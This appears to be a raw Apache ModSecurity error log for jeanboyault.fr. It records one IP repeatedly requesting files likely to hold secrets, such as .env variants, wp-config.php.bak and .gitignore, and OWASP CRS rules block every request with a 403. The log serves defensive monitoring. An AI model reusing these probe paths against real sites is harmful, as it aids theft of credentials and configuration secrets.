[Mon May 11 11:27:40.721557 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:19092] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/production/.env.staging4"] [unique_id "agGhDGS6k_SCYd1AVZqnEQAAAQ0"]
[Mon May 11 11:27:41.886191 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:19092] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhDGS6k_SCYd1AVZqnEQAAAQ0"]
[Mon May 11 11:27:41.912624 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:19122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env.staging4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/production/.env.staging4"] [unique_id "agGhDUYQeUtAPynIs6xQxQAAAAc"]
[Mon May 11 11:27:41.912865 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:19122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/production/.env.staging4"] [unique_id "agGhDUYQeUtAPynIs6xQxQAAAAc"]
[Mon May 11 11:27:43.128656 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:19122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhDUYQeUtAPynIs6xQxQAAAAc"]
[Mon May 11 11:27:45.569349 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:4482] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /profile/.env.test-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/profile/.env.test-backup"] [unique_id "agGhERjZymfuKpjWXeh0RQAAANE"]
[Mon May 11 11:27:45.570077 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:4482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/profile/.env.test-backup"] [unique_id "agGhERjZymfuKpjWXeh0RQAAANE"]
[Mon May 11 11:27:46.747894 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:4482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhERjZymfuKpjWXeh0RQAAANE"]
[Mon May 11 11:27:46.774534 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:4492] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /profile/.env.test-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/profile/.env.test-backup"] [unique_id "agGhEr4KNmD_mZ_vlf8xQQAAAEA"]
[Mon May 11 11:27:46.775178 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:4492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/profile/.env.test-backup"] [unique_id "agGhEr4KNmD_mZ_vlf8xQQAAAEA"]
[Mon May 11 11:27:48.031238 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:4492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhEr4KNmD_mZ_vlf8xQQAAAEA"]
[Mon May 11 11:27:48.055831 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:4502] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /profile/.gitignore1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/profile/.gitignore1"] [unique_id "agGhFL4KNmD_mZ_vlf8xRQAAAFY"]
[Mon May 11 11:27:48.056032 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:4502] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/profile/.gitignore1"] [unique_id "agGhFL4KNmD_mZ_vlf8xRQAAAFY"]
[Mon May 11 11:27:49.216719 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:4502] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhFL4KNmD_mZ_vlf8xRQAAAFY"]
[Mon May 11 11:27:49.243222 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:4508] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /profile/.gitignore1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/profile/.gitignore1"] [unique_id "agGhFb4KNmD_mZ_vlf8xSAAAAEE"]
[Mon May 11 11:27:49.243721 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:4508] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/profile/.gitignore1"] [unique_id "agGhFb4KNmD_mZ_vlf8xSAAAAEE"]
[Mon May 11 11:27:50.469073 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:4508] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhFb4KNmD_mZ_vlf8xSAAAAEE"]
[Mon May 11 11:27:52.886727 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:4542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /protractor/.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/protractor/.env.development"] [unique_id "agGhGJkIEwRJMyDaV55GVQAAAUM"]
[Mon May 11 11:27:52.886953 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:4542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/protractor/.env.development"] [unique_id "agGhGJkIEwRJMyDaV55GVQAAAUM"]
[Mon May 11 11:27:54.058999 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:4542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhGJkIEwRJMyDaV55GVQAAAUM"]
[Mon May 11 11:27:54.084945 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:63138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /protractor/.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/protractor/.env.development"] [unique_id "agGhGkRdw2n9wv6Ai4__9QAAAJM"]
[Mon May 11 11:27:54.085144 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:63138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/protractor/.env.development"] [unique_id "agGhGkRdw2n9wv6Ai4__9QAAAJM"]
[Mon May 11 11:27:55.292863 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:63138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhGkRdw2n9wv6Ai4__9QAAAJM"]
[Mon May 11 11:28:05.107503 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:10386] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /protractor/wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/protractor/wp-config.php.bak"] [unique_id "agGhJZkIEwRJMyDaV55GXgAAAUg"]
[Mon May 11 11:28:05.107721 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:10386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/protractor/wp-config.php.bak"] [unique_id "agGhJZkIEwRJMyDaV55GXgAAAUg"]
[Mon May 11 11:28:07.317432 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:10386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhJZkIEwRJMyDaV55GXgAAAUg"]
[Mon May 11 11:28:07.343560 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:10396] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /protractor/wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/protractor/wp-config.php.bak"] [unique_id "agGhJ5kIEwRJMyDaV55GXwAAAUE"]
[Mon May 11 11:28:07.343787 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:10396] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/protractor/wp-config.php.bak"] [unique_id "agGhJ5kIEwRJMyDaV55GXwAAAUE"]
[Mon May 11 11:28:08.576040 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:10396] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhJ5kIEwRJMyDaV55GXwAAAUE"]
[Mon May 11 11:28:08.602683 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:10410] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.copy.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/public/.env.copy.dev"] [unique_id "agGhKL4KNmD_mZ_vlf8xWgAAAEY"]
[Mon May 11 11:28:08.602898 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:10410] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/public/.env.copy.dev"] [unique_id "agGhKL4KNmD_mZ_vlf8xWgAAAEY"]
[Mon May 11 11:28:09.782649 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:10410] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhKL4KNmD_mZ_vlf8xWgAAAEY"]
[Mon May 11 11:28:09.807942 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:10416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.copy.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/public/.env.copy.dev"] [unique_id "agGhKURdw2n9wv6Ai48ABQAAAIk"]
[Mon May 11 11:28:09.808371 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:10416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/public/.env.copy.dev"] [unique_id "agGhKURdw2n9wv6Ai48ABQAAAIk"]
[Mon May 11 11:28:11.041105 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:10416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhKURdw2n9wv6Ai48ABQAAAIk"]
[Mon May 11 11:28:11.067755 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:10422] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.live5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/public/.env.live5"] [unique_id "agGhK0YQeUtAPynIs6xQ9AAAABQ"]
[Mon May 11 11:28:11.067966 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:10422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/public/.env.live5"] [unique_id "agGhK0YQeUtAPynIs6xQ9AAAABQ"]
[Mon May 11 11:28:12.263528 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:10422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhK0YQeUtAPynIs6xQ9AAAABQ"]
[Mon May 11 11:28:12.288860 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:10434] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.live5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/public/.env.live5"] [unique_id "agGhLL4KNmD_mZ_vlf8xWwAAAFc"]
